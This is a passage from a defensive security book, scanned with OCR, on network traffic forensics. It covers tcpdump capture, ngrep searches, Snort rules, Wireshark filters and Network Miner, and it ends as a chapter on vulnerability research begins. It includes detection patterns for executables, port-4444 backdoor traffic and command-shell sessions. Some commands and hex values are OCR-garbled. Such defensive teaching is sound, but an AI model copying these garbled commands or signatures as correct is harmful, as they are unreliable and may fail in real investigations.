ing the wire, as well as files, and authentication attempts for that server. 

A network defender, on the other hand, collects network traffic across the wire in order to 
identify intrusions into the network, and solve the who, what, why, and how of an attack that 
has occurred. Therefore, network traffic is invaluable to network investigators/defenders and the 
smartest defenders will have network sniffers up on multiple points in their network. Therefore, 
this chapter is solely focused from the network defender’s point of view, as it is a highly unlikely 
intrusion method for experienced hackers. 
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Network Placement 


In Figure 8.1, we go back to Pwn3d Corporation to look at areas where sniffing will be present. 
Generally, you will see sniffers connected to the external Internet router and internal router, which 
will grab a majority of the traffic. Additionally, many times critical infrastructure segments such 
as defense projects would be monitored. Once an intrusion is possibly detected, network defenders 
will move to place new sniffers in more strategic places to respond to the attack proactively, trying 
to understand the scope of the intrusion and any lateral movement occurring. If the hacker moves 
laterally and increases the scope of the investigation then network defenders will move accordingly 
to isolate and record traffic to understand the severity of the attack. 


Collision Domains 


Network packer sniffers can monitor packets going across the wire, however they will only be able 
to sniff the entirety of the network if the ports they are using are in the same collision domain. In 
the old days, if you plugged into a hub and started sniffing the network you could grab as many 
packets as you wanted because a hub is a Layer 1 device that forwards all packets out over every 
interface (or port). However, then switches came along, which are much smarter devices that do 
frame switching across layer 2 of the network, and some switches now even have functionality all 
the way up to layer 3 of the OSI model. Some higher-end switches will do limited routing on IP 
packets, which normally is reserved for a router. In a switch though, every port/interface is consid- 
ered its own collision domain and will not forward packets across all interfaces unless it is a broad- 
cast packet or is set up for some type of network monitoring. Therefore, the hacker sniffing the 
network is once again not as valuable as it used to be—he can’t access many of the packets on the 
network because they are not in the same collision domain. The only way for a hacker to change 
that is to hack the switch, discover the port they are plugged into and change it to a switched port 
analyzer (SPAN) port. The hacker would be more likely to sniff if he were on a critical server. The 
amount of traffic generated and lag associated with the network would likely not be worth the 
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Figure 8.1 Sample network placement diagram. 
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effort due to detection of tools being transferred, and risking losing control of the server due to a 
very limited Internet connection or messing up the internal network configurations. 


Intrusion Detection at the Packet Level 


Generally, when an intrusion is detected, it’s because an individual is alerted by their system act- 
ing unusual or a network monitoring analysis team of some sort is alerted by unusual activity. 
Network monitoring teams are sniffing the network as shown previously at critical areas, network 
perimeters, and most importantly ingress and egress of the network itself. Normally, by sniffing, 
they are either deploying a sniffer that is gathering the entirety of network traffic being sent over 
the network or they have an intrusion detection system in place that is at least detecting anoma- 
lies in the traffic. Monitoring teams have normally three options when monitoring the network: 
capture the entirety of the packets going across the network, capture the first 96 bytes of the 
packet headers in order to do net flow analysis, or monitor the traffic coming across the network 
for anomalies. 


1. Capturing entire packets: Allows for full network analysis, and reconstruction of sessions, 
file transfers, and so on, and is the most complex to analyze and a time-consuming option; 
however, it is the most thorough. 

2. Capturing packet headers: This option is what is used for netflow analysis, looking for 
abnormal activity to ports, protocols, and known bad IP addresses that are blacklisted or 
threats in general. Also, it looks for abnormal date/time discrepancies, for instance a server 
is beaconing at 3 am every 2 weeks to a certain IP address. This is a good option for detect- 
ing network anomalies, however it can be slow to analyze and is typically used over a period 
of time. However, investigators do not have any ability to actually examine the contents of 
packets. 

3. Capturing for intrusion detection: This option allows for intrusions to be detected in real 
time on a network, however, packet captures arent typically recorded. Generally, this is 
one way intrusions can be easily detected and responded to. Network defenders will set up 
intrusion detection systems (IDSs) in key areas, which check against signature databases for 
intrusion-related events and trends for malicious activity. If an event were to occur, network 
defenders have the option to start turning on full capture monitoring on key segments that 
may have been intruded upon. 


Monitoring Limitations 


Caution: Network monitoring is a processor intensive activity and can seriously degrade the 
network performance of a switch or router. Make sure when monitoring that the device is capable 
of handling the load without seriously degrading performance of the network. Generally, if the 
device is processing too much traffic, in your captures you will start seeing dropped or malformed 
packets and increased response time of hosts may be present. In theory, there have been discus- 
sions of the attacker being able to detect monitoring by the performance of the network, or the 
response of an associated packet when he sends certain packets over the network. Therefore, it is 
possible for a hacker to detect a network sniffer running in promiscuous mode. 
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Network Response Methodology 


B Monitor: Many initial intrusions can be detected by monitoring network data of some sort, 
whether that be by full packet capture, netflow data, or IDSs monitoring the network (see 
Figure 8.2). 

B Detection: Once the data is collected, they need to be interpreted and detected upon using 
intrusion detection systems such as Snort. Note that network defenders have the ability to 
run network captures through Snort after the fact. 

B Analysis: Once the data has been collected and detected, analysis occurs. Network defenders 
are likely going to monitor and analyze the network traffic on which an intrusion detection 
system (IDS) alert has occurred. 

B Response: Once analysis has occurred via examining the network traffic, then it's possible 
that these systems need to be forensically analyzed; therefore, investigators are going to per- 
form an incident response and do forensic analysis on the affected system while additionally 
trying to analyze the scope of the intrusion. 


Monitoring/Capturing 


One of the most popular programs to sniff traffic on the network is tcpdump, where TCP stands 
for Transmission Control Protocol. The tool tcpdump is a Linux command line program that uses 
libpcap, a library to capture packets. Investigators use this program to capture network traffic eas- 
ily and efficiently and also use this program to filter data down to better investigate. Hackers also 
use this program to dump data off the network and steal information off of it. The files tcpdump 
creates are binary capture files, meaning they are full binary packets and require a program to be 
interpreted. Sample commands include sudo tcpdump-s0 —nntttt -C 100M -w capture.cap. 


Response 


Figure 8.2 Network response methodology. 
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Command line switches for tcpdump include 


B -s: Snapshot length. This basically tells tcpdump how many bytes to read through the packet. 
tcpdump defaults to a snap length of 96 bytes. This will only read through the packet header 
and not read any of the application data contents. Therefore, when sniffing make sure —s0 
is designated. 

B -r: Allows you to read packets from the file. This is used for filtering using Berkley Packet 
Filter syntax, to filter only packets belonging to a certain IP address. 

B -w: Allows you to write all the packets being sniffed on the network or read via a file with a 
filter to a new file. 

B -nn: Prevents the conversion of addresses such as hosts and ports to names. This is important 
in an investigation so the domain name system (DNS) doesn't beacon to the attacker and/or 
so investigators focus on the IP addresses and ports. 

B -tttt: This allows the time stamp to be printed by date on each dump line. This is impor- 
tant to an investigator trying to where and around when an intrusion may have happened. 

m -C: This command designates the file size of each capture file. Basically when tcpdump 
starts sniffing, once it exceeds the size it will write a new capture file. This is important when 
using graphical user interface (GUI) tools such as Wireshark, as it allows you to open smaller 
captures for analysis. Otherwise, the capture would be too big to open. 

B -X: This command prints ASCII and HEX to an output buffer on screen to view traffic; this 
can also be used to output to a text file for searching. 


Here is a sample of the tcpdump command in action: 
hacker@ubuntu:~$ sudo tcpdump 


tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, 
link-type ENIOMB (Ethernet), capture size 96 bytes. 


Note: The default snapshot length is 96 bytes! A good way to determine the snapshot length of a 
packet capture is to just run the file command. 


Viewing Text Data 


Sometimes it may be important to output to the buffer, or to a text file, to quickly see what is inside 
the packet capture or what types of packets are being gathered across the network. The -X command 
will allow this to happen within tcpdump; otherwise, you can use the hexdump -C command to 
view what is in the packet capture itself. A sample command is: 


sudo tcpdump —s0 —nntttt —X | tee capture.txt. 


Note the tee command lets you see what's on screen. Another sample command is sudo 
hexdump -C capture.cap. This command allows you to view the hex and ASCII contents of a cap- 
ture file. This can be good for searching and filtering through the capture for pertinent information. 


Searching Text and Binary 


Once you have captured binary or text files, you have to be able to search through it for relevant 
information. Many times when network investigators are going through network capture traffic 
they have collected possibly gigabytes and gigabytes of data. It takes a really long time to process 
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searches on binary capture files, so therefore sometimes it's most convenient to convert them to a 
text file. To convert to a text file, 


B tcpdump -r capture.cap» capture.txt «— Converts only headers to search 
B tcpdump -s0 -X —r capture.cap» capture.txt «— Converts HEX/ASCII to search 


You have to make sure that you are converting with the -X command in order to be able to 
search text through the application layer of the packet. Otherwise, you can only do IP header 
and net flow analysis, which would allow you to search for IP addresses and port combinations. 
To view portions of your capture.txt use cat capture.txt | head -10, which gives the first 10 
lines. This will allow you to view what is actually inside the text file you converted to make sure 
the conversion went right or the capture file is good. 
To perform text-based search on text files, you can use gawk or grep on systems running Linux. 


B gawk '/searchterm/ capture.txt 
B grep “searchterm” capture.txt 


Investigators can perform text-based searches on network captures using grep or gawk to search for 
known bad terms such as malware signatures, IP addresses, or even file names. 
To perform searching on binary files: 


ngrep -I hacker.cap -0 PE.cap -q -X 50450000 

-l: This command is for input. 

-O: This allows you to write new capture file for all patterns matching. 
-i: Tells you to ignore case for your expression. 

-X: This allows you to search for hex values rather then text. 

-q: Tells you not to display hashes and makes ngrep faster. 


This command will take a capture file and look at every packet for that hexadecimal file header of 
a portable executable (PE) file, and output each of those packets to a new PE.cap file. This is very 
useful for going through entire packet captures that are not yet filtered; you can then open these 
packets in a tool such a Wireshark and start performing analysis in order to figure out how an 
intrusion may have occurred. 


Filtering 


Generally, when searching for data inside a capture file, many network investigators pare the data 
down to a more friendly capture file to work with by performing filtering. They will identify an IP 
address that was determined to be malicious, and they will then filter the data only involving com- 
munications between the affected host and other hosts. This will allow investigators to pinpoint 
other places where a hacker has compromised other systems and determine how the victim got 
compromised in the first place. It then makes it much easier to start perform string searches and do 
Snort detection, and even allows you to start opening some of the traffic into Wireshark. tcpdump 
allows for the use of Berkley Packet Filter syntax to pair down the data. Therefore, you can look 
for source and destination hosts, protocols, or even ports. A sample command is tcpdump -nntttt 
-s0 -r old.cap -w new.cap host 10.1.1.1 AND port 80. 
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“host” < Looks for a specific host. 
“port” < Looks for a specific port. 


net” < Looks for an entire network. 
“tcp/udp/icmp” < Looks for the protocol being used. 


Also, this allows for a logical AND, NOT, and OR separators so you can combine filters to be 
more detailed with your filtering techniques. Note: This can also be done with Wireshark. 

Therefore, once you have captured your data, and once you've filtered down the data, next 
comes finding relevant intrusion-related artifacts throughout the packet capture. 


Windows Executable and Signatures 


Windows binary executables contain what is a called a PE header; therefore, malicious executables 
being transferred over the network in order to compromise a system will contain this signature. 
Therefore, searching or detecting on this signature is a good way to detect malware going over the 
network, especially when combined with other rules. 


Common File Signatures of Malware 


MZ = 4D 5A — Windows Executable DLL, COM, DRV, EXE 
PE = 50 45 — Portable Executable 

PK. = 50 4B 03 04 — ZIP File 

96PDF = 25 50 44 46 — PDF File 


MZ actually is the DOS stub of a portable executable. Typically, after the MZ header you will find 
a string of “This program cannot be run in DOS mode,” which is in turn typically found within a 
Windows executable. This is also a good string search to perform in order to detect an executable. 


ET HxD - [C:\Documents and Settings\ Administrator Desktop Hai exe] =|) x} 
| 2] Ele gdt Search View Analysis Extras Window 2 IES) 
Pe || e CNN: 


S] HxD.exe | 


Offset(h) 03 04 05 06 07 08 09 OA OB OC OD OE OF 


00000000 OO 02 00 OO OO 04 OO OF OO FF FF OO OO MBZzP......... yy.. 
00000010 OO 00 00 00 00 40 OO 14 0000 00 00 OO .,....... B......- 
00000020 00 00 O0 00 OO 00 OO 00 00 OO 00 O0 OO  ........eeeennnn 
00000030 00 00 00 OO OO 00 OO OO 00 OO 01 OO OO ...............-. 
00000040 OE 1F B4 09 CD 21 BB O1 4C CD 21 90 90 ?....'.Í!,.LÍ!.. 


00000050 73 20 ë 61 63 6B 55 72 20 74 GF 6F 6C This hacker tool 
00000060 65 20 72 75 6E 20 75 6E 64 65 72 20 57 t be run under W 
00000070 
00000080 
00000090 
00000040 
00000080 
000000co0 
00000050 
oo0000£0 
000000F0 
00000100 
00000110 
00000120 


212 m Defense against the Black Arts 


A freeware program such as HxD allows you to view the HEX and ASCII code of a file, in 
order to view the signature and underlying hexadecimal and ASCII structure. It contains an MZ 
header along with a PE since it is a Windows executable. As an investigator, you can use this to 
discover key characteristics of malware or indicators of what a piece of malware or an executable 
does. Many times hackers will try to modify key characteristics of files in hex editors to change the 
signature of their program. Remember, just changing 1 bit of the program completely modifies the 
hash signature. In the example above, the hacker changes the MZ header of “This program can’t 
be run under...” to “This hacker tool.” Ifa Snort signature was trying to detect on that string, since 
the hacker changed it, it would no longer work. 


Snort 


Snort is an IDS that allows for sniffing and detection on the network in real time. It can also be used 
against capture files after the fact. Snort rules can be configured to detect intrusions, from exploita- 
tion and research gathering, to transferring malware over the network. This command will allow 
you to run a packet capture through Snort: 


snort —c /etc/snort.conf —r /evidence/capture.cap -1 /evidence/ 


-c: This designates the snort.conf file to be used when running Snort. 

-r: This designates which capture file to run 

-l: This designates where to store the log file created. 

-y: This command allows you to append the year to your Snort alerts, this is important when 
captures span multiple years. 


Note: If you don't specify a different log location and run the command multiple times, Snort 
will append the data to the file before it. 


Snort Rules 


Snort rules are located in the /etc/snort/rules folder. The Snort rules contains the rules that 
Snort alerts upon. Many companies out there make Snort rule sets to detect the latest malware 
and intrusion-related artifacts. As part of downloading Snort, it also has community rules, 
which have been submitted by members of the Snort community and are freely available. Also 
available are the Sourcefire VRT certified rules, which have been developed and tested by 
Sourcefire themselves, who created Snort. SRI International releases a free 160 day malware 
Snort rule set at http://mtc.sri.com/live data/signatures/. However, many network defenders 
out there will create their own Snort rules in order to detect intrusion threats known within 
their network: 


1. Create a hacker.rules file in /etc/snort/rules. 
2. Edit the Snort.conf file customizing rule set and add include $RULE_PATH/hacker.rules. 
3. Edit the hacker.rules file with your own developed rule sets. 
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Making a Snort Rule 


Snort rules are written out in a single line; the Alert option allows the user to alert on the content 
and logs the packet. The IP tells us to look at whether it uses all transport layer traffic instead of 
TCP or user datagram protocol (UDP). The ANY ANY to ANY ANY tells Snort to run against all 
packets in the network or capture from source IP and PORT to destination IP PORT. Lastly, the 
most important parts of a Snort rule are the content and the message. The content is what allows 
Snort to detect on various types of records. For example, PE detected is a custom message that can 
be used when that alert is triggered. A simple rule is alert ip any any — any any (content:“|05 40 
00 00|”; msg: “PE Detected”). 


Sample Content Fields 


Sample content fields include 


B content: “exploit.exe”; «— This allows searching by text. 
W content: “|05 40 00 00|” < This allows searching by hexadecimal. 
B content: “/exploit[0-9].exe/” < This allows searching by regular expression. 


Notice in the content field above we have the ability to search for hexadecimal code. This is impor- 
tant for when we are detecting a file header signature, such as when transferring file types over the 
network, besides the ability to search for text. 


Analysis 


Once we have detected malicious alerts and IP addresses/ports, then it is a good idea to start look- 
ing at the packets themselves to figure out what happened in an attack. Wireshark is a network 
protocol analyzer and is a great tool to dive deep into packets to start performing packet analysis to 
find out how a hacker may have exploited a network. Wireshark is widely popular and is free/open 
source, downloadable at http://www.wireshark.org. Wireshark has the ability to perform filtering 
and searching in a GUI window. However, when working with large capture files you may want 
to pair down data by using programs such as tcpdump or tshark to filter the data, as captures can 
become unusable in Wireshark when they exceed 500 MB of data. Once that data is paired down, 
investigators can use this to analyze malicious attacks on the network and even detect command 
and control over the network. Wireshark is one of the primary investigative tools of network 
defenders to investigate network traffic. 


Capture Information 


When working with a capture file, sometimes it’s important to look at the capture beforehand to 
see the size of the capture file and to determine how many packets are in the capture. 
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Capinfos 


Using Capinfos will give you the file type, number of packets, the file size, and capture duration. 
One of the most important pieces of information of Capinfos is the start time and end time dates. 
This allows you to pinpoint the start and ending points of the capture to make sure it is around 
when the incident or intrusion may have occurred. 


E root@bt:-# capinfos capture.cap 
— File name: capture.cap 
— File type: Wireshark/tcepdump/... - libpcap 
— File encapsulation: Ethernet 
— Number of packets: 2480 
— File size: 1412513 bytes 
— Data size: 1372809 bytes 
— Capture duration: 94.450190 seconds 
— Start time: Thu Nov 11 09:31:51 2010 
— End time: Thu Nov 11 09:33:25 2010 
— Data rate: 14534.74 bytes/s 
— Data rate: 116277.92 bits/s 
— Average packet size: 553.55 bytes 


Setting Up Wireshark 


When using Wireshark for investigative purposes, it’s important to set the time format and disable 
name resolution. This is so you have a consistent date and time to look for incidents and also you 
don’t want Wireshark to beacon the DNS addresses of an attacker or resolve protocols. Remember, 
just because 443 is being used may not necessarily mean it is HTTPS traffic. Therefore, we only 
want to see the port numbers. 


B Fix date and time: View > Time Display Format > Date and Time of Day. 
W Disable name resolution: View > Name Resolution > UNCHECK. 
W Enable for media access control (MAC), network, and transport layer. 


Coloring Rules 


Wireshark allows you to color specific traffic certain colors whenever it are found within a packet 
capture. This can be a very useful tool for finding malicious actions or even determining new 
connections. This is found by going to View > Coloring Rules. In here you will find a default list 
of coloring rules set up by Wireshark. It is recommended that you clear them by highlighting 
them all, clicking Delete, and setting up your own depending on what you are looking for. If 
for any reason you want to re-enable the Wireshark default coloring rules just click Clear in this 
window. 
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Ti Wireshark: Coloring Rules - Profile: Default -/O) x 
[Fiter 


( | ip dst 224.0.0.0/4 && ip.tt! < 5 && !pim) || (ip.dst 


smb || nbss || nbns || nbipx || ipxsap || netbios 


http || tcp.port == 80 
ipx || spx | dem | 


deeroc 


I 
i 
i 
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In the example, TCP SYN+ACK was added in order to color every additional new TCP con- 
nection. When you have a TCP three-way handshake you have a SYN + ACK received when 
the new connection is established between two hosts. Therefore, this is a good indicator to color 
because you can tell when a new connection has been established. To color TCP SYN + ACK: 


1. Go to Coloring Rules. 

2. Click New. 

3. Add tcp.flags.syn == 1 & & tcp.flags.ack == 1. 
4, Click Up and make it first in the order. 


Filtering Data in Wireshark 


The power of Wireshark relies on its ability to filter through packets to look for relevant data. 
Wireshark has hundreds of filters available, just click on the Expression button right next to the 
filter box. Once a filter has been entered into Wireshark it only shows packets involving that cer- 
tain filter. Therefore, this can be used to only look at IP address combinations, an executable, or 
even certain application layer fields. 


Wireshark Important Filters 


E ip.addr == 192.168.1.2 < This searches for a IP address of 192.168.1.2. 

tcp.port == 4444 < This searches for a TCP port of 4444. 

udp.port == 4444 < This searches for a UDP port of 4444. 

tcp.flags.syn == 1 and tcp.flags.ack == 1 < This sets the TCP SYN + ACK flag. 
frame contains 50:45:00:00 < This searches for all hex contents of a PE. 

frame contains "Microsoft Windows” < This searches for MS-DOS CMD shell. 
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Wireshark Operators 


B && < Logical AND, allows you to combine filter AND filter. 
|| < Logical OR, allows you to combine filter OR filter. 
B ! < Logical NOT, allows you to NOT look for a filter. 


Wireshark Filters 


As you can see in this example, this will look for IP address 192.168.22.130 and port 4444. This 
might be useful if say we figure out malware was beaconing over 4444 and compromised this IP 
address. Then we might be able to find other indicators of compromise and what the attack com- 
menced to do over the network to the host. 


exploit.cap - Wireshark j lO x) 


Ele Edt yew Go Capture Analyze Statistics Telephony Tools Heb | 
Seeee Sax2air_esovoF2leeiaaania -| 


Filter: |ip.addr == 192,168.22, 130 && tcp.port == 4444 * Expression... Clear Apply 


69 252.356404 192.168.22.130 192.168.22.133 48654 > krb524 [ACK] Seq-1 A 

70 252.357051 192.168.22.130 192.168.22.133 ChannelData TURN Message [Ma] 

71 252.500250 192.168.22.133 192.168.22.130 krb524 > 48654 [ACK] Seq=1 A 

72 252. 500672 192.168. 22.130 192.168. 22.133 48654 > krb524 [PSH, ACK] Se 

73 252.684199 192.168. 22.133 192.168.22.130 krb524 > 48654 [PSH, ACK] Se 

74 252.685147 192.168. 22.130 192.168. 22.133 48654 > krb524 [ack] Seq-245 >| 
> 


Source ER 51318 (51318) 

Destination port: krb524 (4444) 

[stream index: 1] 

Sequence number: O (relative sequence number) 


c a c 
0010 00 3c 90 f6 40 00 40 06 fb 6d cO a8 16 82 cO a8 
0020 16 85 c8 76 11 5c bO 8b 2e db 00 00 00 00 a0 02 
10030 16 dO Oa c6 00 00 02 04 05 b4 04 02 O8 Oa 00 ac 
0040 be 2d 00 00 00 00 O1 03 03 06 


L 
@ [Ready to load or capture Packets: 79 Displayed: 14 Marked: 0 Load time: .. | Profile: Default 


As you can see in this instance, Wireshark has three main panes or windows that display 
information about the packet capture. The first pane contains the window of all the packets in the 
packet capture; as filters are entered it will only display packets matching that filter. 

The middle pane shows the underlying structure of the packet from the various layers. It shows 
the frame, Ethernet, IP information, the transport layer, and finally will dive deep in the data and 
application depending on the protocol being used, such as HTTP. If you expand this section and 
look in the data layer, it's possible to right click on one of those fields in order to filter down. This can 
be extremely useful when the investigator is not sure what kind of filter to use. Lastly, the bottom 
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pane contains the actual data of the packet in hexadecimal, or ASCII. This can be useful when try- 
ing to determine what data was being sent over the network from the hacker to the victim. Also, 
know that you can search through all displayed traffic by hitting Control-F or going to Edit > Find 
Packet. It will also allow you to search based upon display filters, hex values, or strings. 


Tl Wireshark: Find Packet E 2/5) x) 
(Find 


By: © Display filter ( Hex value (^ String 


rte: [Posy SSS 


r Search In String Options Direction 
© Packet list [7 Case sensitive C Up 
© Packet details || Character set; f$ Down 
(8 Packet bytes [em Unicode & Non-Unicode hd | 


oo | TN 


For instance, using this will allow us to search for a MZ header through the existing network 
traffic display. This is useful if you don't want to filter down the traffic and would like to leave all 
the packets displayed on the screen. 


Packet Options 


By clicking on a packet in the upper pane, you have a number of options available to aid in an 
investigation of an attack. 


Mark Packet (toggle) 
Ignore Packet (toggle) 
© Set Time Reference (toggle) 


Manually Resolve Address 
Apply as Fiter 

Prepare a Fitter 
Conversation Filter 
Colorize Conversation 
SCTP 

Follow TCP Stream 


Follow UDP Stream 


©) ey a 


Follow SSL Stream 
Copy » 
"Si Decode As... 


c Print... 
Show Packet in New Window 


Notice here we have the option to show the packet in a new window, we can apply additional 
filters or colorization rules as needed, we can mark packets (this will highlight the packet in black, 
as it may be interesting to come back to later), and most importantly we can follow a TCP stream. 
Applying as a filter is very useful if you have a packet that you want to look for that's similar but 
you don't know how to design the appropriate filter. Also, manually resolving the address allows 
you to designate a name to that IP address if needed. This is useful if you get confused with 
addresses and just want to put "hacker." 
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Following the Stream 


Following the stream allows us to look at all the data sent and received by an individual TCP or 
UDP session, which may span over just a few packets to many thousand. 


F Follow TCP Stream 


m 11G.roj.S..Microsoft windows [Version 5.2.3790] 
(C) Copyright 1985-2003 Microsoft Corp. 


:NWINDOWSNsystem32 »| 


In this example, you can see following a TCP stream allowed us to view the command and 
control of this server. As you can see, the server is using a standard Windows command shell to 
beacon and interact out over the network. As long as this communication is in cleartext it should 
be viewable, and very useful to an investigation. As the hacker issues new commands to the server 
they should also be displayed either in this stream or others. Remember the hacker is going to try 
and seed as many different command and controls as possible because he wants to prevent being 
detected or the disabling of his connections. Therefore, investigators are going to try and detect 
as many TCP streams as possible in order to find out everything that's being done on the system. 


Wireshark Statistics 


‘The Statistics tabs will give detailed net flow information for analysis. One important aspect of this 
section is Statistics > Conversations. This will outline the various IP addresses involved in the packet 
capture. You can see the various conversations between those IP addresses and how many packets 
were transmitted. This is especially important when doing network investigation. Some indicators 
that might be malicious are connections to the same external IP address. Also, you may see more 
internal IP packets being uploaded than downloaded. This is a common indicator of exfiltration, 
because on a regular network your hosts should almost always download more packets than they send 
externally out through the network. Therefore, if you see a jump of packets going out to an unknown 
IP address, they could be exfiltratration attempts of databases, documents, pictures, or more. 


iei 
Ethernet: 7 | «e Channel | eoo Tu: 6 | iie AE sie sce | Tep: 5 | Token Rina Jupp: 7 Juss wian | 
IPv4 Conversations 

Address A * [Address 8 4 [Packets 4 [Bytes 4 [Packets A->B 4 [Bytes A->B 4 [Packets A«-B 4 [Bytes a<-B afi 
192.168.22.1 192,168,22,255 15 1947 15 1947 0 0 

192.168.22.130 —  192.168.22.133 2 Sil 17 3610 12 1301 : 
192.168.22.133 192.168.22.254 2 65 1 351 1 342 : 
192.168.2.2 192.168.22.133 20 1723 10 952 10 m : 
192.168.22.1 224,0.0.251 5 365 5 365 0 0: 
192.168.22.133 192.175.486. 2 24 1 164 1 60 : 
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In this example we can see the communication with the outside external address of 192.175.48.1 
and that the most packets were sent between 192.168.22.130 and 192.168.22.133. Notice you can 
see how many bytes were transferred and how many bytes were sent back and forth between each 
other. 


Network Extraction 


Sometimes investigators will want to mine traffic for files in order to see what type of traffic is 
being sent over the network, and to see various artifacts. Network Miner allows real-time packet 
sniffing and analysis of network traffic over the network and also gives the ability to run packet 
captures through the program. Basically, Network Miner will identify hosts in the communica- 
tion, frames, and most importantly all the files involved in the transmission whether they are an 
executable or even an image, as the program will automatically carve it out of the traffic. This tool 
can be very useful for network defenders trying to figure out what happened over the network. 
Network Miner is freely available at: http://networkminer.sourceforge.net/. Network Miner will 
extract the following: 


DNS: Includes a list of all domains visited. 

Host: Includes all hosts involved in packet capture. 
Parameters: Parses our application level parameters. 
Frames: Lists out frame information. 

Files: Carves out application layer file transfer information. 
Images: Parses out images out of network traffic. 
Messages: Parses out messages in HTML such as AIM. 
Keywords: Allows keyword searching through the traffic. 
Cleartext: Parses out cleartext entries. 

Credentials: Extracts any user authentication credentials sent over the network. 
Sessions: Parses out all sessions of traffic. 


mix 


Ele Tools Help 
Socket VMware Accelerated AMD PCNet Adapter (192.168.22.133) -] b Start | d Stop | 


DNS (22)] Parameters (899) | Keywords | Cleartext | Anomalies | [aces Panel 
Hosts (31) | Frames (22)| Files (158)] Images (110)] Messages | Credentials (12)] Sessions (10446)] | 


Sort Hosts On: [IP Address (ascending) z] Sort and Refresh | 
"n 


MD5 
NM, 201.. 72bd14.. 


TTL: 128 (distance: 0) 
Open TCP Ports: 
=> Sent 615 packets (137,693 Bytes], 0.00 % cleartext (0 of 0 Bytes} 
<@ Received 964 packets (792.331 Bytes), 0.00 % cleartext (0 of 0 Bytes] 
(2 Incoming sessions: 2 
& Outgoing sessions: 105 
| Host Details 
E-A 192.168.22.135 (Linux) 
H-Q 192.168.22.255 
GÆ 208.29.69.138 [content yieldmanager.com] (Windows) 
GÆ 208.29.69.178 [content yieldmanager.edgesuite.net] (Windows) 4 >I 
G-A 208.29.69.179 [b.scorecardresearch.com] (Windows) 


(a). 208.201.238 51 Ifto.ora com! (Windows) X] || Reload Case Files | 


Live Sniffing Buffer Usage: | 


OBS E98] [8H] 


E 
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In this screenshot, the Hosts tab will identify all the hosts involved in the communication in the 
network. You can identify the IP address, the MAC address, the hostname, and even the operating 
system being used. Additionally you can see the various sessions involved in the communication 
and the TCP ports used. This is very valuable information for a network investigator trying to 
figure out malicious traffic in a network capture. 


BIET 
Ele Tools Heip 
Socket VMware Accelerated AMD PCNet Adapter (192.168,22.133) zl b Start] d Stop J 


DNS (22)| Parameters (899)] Keywords | Cleartext| Anomalies | pe 
Hosts (31)| Frames (2200) Files (158) | Images (110) | Messages | Credentials (12)] Sessions (10446) MDS 


NM, 201.. 72bdi4. 


imp.9E037D39.html 
. search EC7E2B.html 
.  mc.exe.59392.0.0.html 
. ads.738276D7.html 
. urchinjs.javasciipt 
search ABTFÜEO7.javascript į 
.. search 85600FE2. javascript 
. search 394F534E javascript 
.. google service |s.javascript 
. google ads.js javascript 


el ads. 3LB4330E javascript 

7 'eventConirol ler.js.javascript 

. Show adsjs.javascript 

. render ads.js.javasciipt 

. expansion embed .is.javas... 

. est domain.js javascript 
sma8 js. javascript 
imgad.F24A5342 jpeg ipeg 
imgadF24AS3A2[l]ipeg ^ ipeg 


n 


Reload Case Files 


Additionally, Network Miner will extract and carve files out of the application data of the 
network traffic and identify the file name used and the protocol it was sent over. From here you 
can actually right click and open up the file or folder in its entirety to view. This is important 
from a network defense standpoint because the investigator can actually look at malware being 
transferred over the network in order to figure out how a system has been compromised. It’s also 
important to note that in the root folder under \NetworkMiner-0.92\AssembledFiles are all the 
carved out files listed by IP address. 


Note: This folder can vary depending on your version of Network Miner. 


-iBixl 
Ele Tools Help 
Socket; VMware Accelerated AMD PCNet Adapter (192. 168.22.133] z] b Start | i Stop | 


[- Case Panel — —— 
MD5 
NM 201.. 72bd14..) 


Hosts (31)] Frames (22xxx}| Files (158)| Images (110}| Messages | Credentials (12] | Sessions (10446) | 
DNS (22) | Parameters (899)| Keywords | Cleartext| Anomalies | 


1 Sever [5-]ip LOWS = | Tins. LONS Guy —_LONS frwer_L 
72.14.204.101 
74.50.63.27 

.. 64.233.169.165 
64.233.169.156 
98.136.154.147 
208,29.69,138 
98.136.152.55 
76.13.234.33 
208.29.69.178 
216.137.41,236 
64.27.100.250 

i.. 64,233, 169.167 
216.137.41.223 
933.184.216.169 
208.29.69.179 
64,94,107.11 
64,94.107.19 
87.98.159.245 

. 64233159155 
208.201.239.51 


BBBBEDSDOBSUZSOSOSORM 


Live Sniffing Buffer Usage: | 
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The DNS tab of Network Miner contains every single DNS query on a network with the 
apparent DNS answer. This is extremely important to an investigator, because generally when a 
hacker compromises a system he puts a piece of malware on the system that allows the computer to 
be commanded and controlled. This command and control beacons to where it’s being controlled 
from, and this beacon can only be a DNS or IP address. Therefore, it’s easy to see possible clues to 
where malware is beaconing. 


Krewonemeros2 ——— lolx! 
Ele Tools Help 
[Socket VMware Accelerated AMD PCNet Adapter (192.168.22.133) x] b Start | id Stop | 


DNS (22)| Parameters (899) | Keywords | Cleartext| Anomalies pecie 


| 
Hosts (31)| Frames (224) | Files (158}] Images (110)] Messages Credentials (12) | Sessions (10446)] MDS 


NM 201.. 72bd1 4.. 


. PREFzID-410ed28228f[c... 


PREF=ID=410ed28228ffc... 


Live Sniffing Buffer Usage: | 


The Credentials tab of Network Miner can be another important part of an investigation. 
Investigators can see all credentials passed over the network, whether that is the hacker logging 
onto a FTP server or HTTP cookies being passed. Therefore, if some type of compromise may 
have occurred on the system, you can possibly see invalid access attempts. If the username and/or 
password are also submitted in cleartext you can fully view it. 

There’s not much the hacker can do to defend against the capturing and investigation of 
network traffic, and this is one of the network defender/investigators greatest assets in solving an 
attack. 


Summary 


From this chapter, remember network defenders collect network traffic across the wire in order to 
identify intrusions into the network, and solve the who, what, why, and how of an attack that has 
occurred. Therefore, network traffic is invaluable to network investigators/defenders as they will 
perform monitoring using programs like tcpdump, try to detect intrusions using Snort, filter that 
data down to the detected affected IP addresses, search for relevant artifacts using gawk, egrep, 
and ngrep, and then start performing analysis with tools such as Wireshark and Network Miner. 
Network captures are a very valuable asset for network defense. 


Chapter 9 


Research Time: Finding 
the Vulnerabilities 


Overview 


In this chapter we further the research process and focus on more direct methods for gathering 
intelligence on targets. Thus, once the hacker has exhausted all indirect intelligence gathering 
methods, he will move on to more direct methods in order to obtain the information needed in 
order to penetrate the network or system. The hacker must find vulnerability in order for him to 
exploit a target. Therefore, as part of the hacker’s research one of his primary goals is to find vulner- 
abilities within the information system. A vulnerably is essentially a weakness and an exploit is what 
is used to take advantage of a vulnerability. Hackers use exploits in order to break into the system 
and use their exploit to allow them to be malicious, such as creating a backdoor into the system, 
performing a denial of service attack, adding users to the system, or even deleting data. Regardless, 
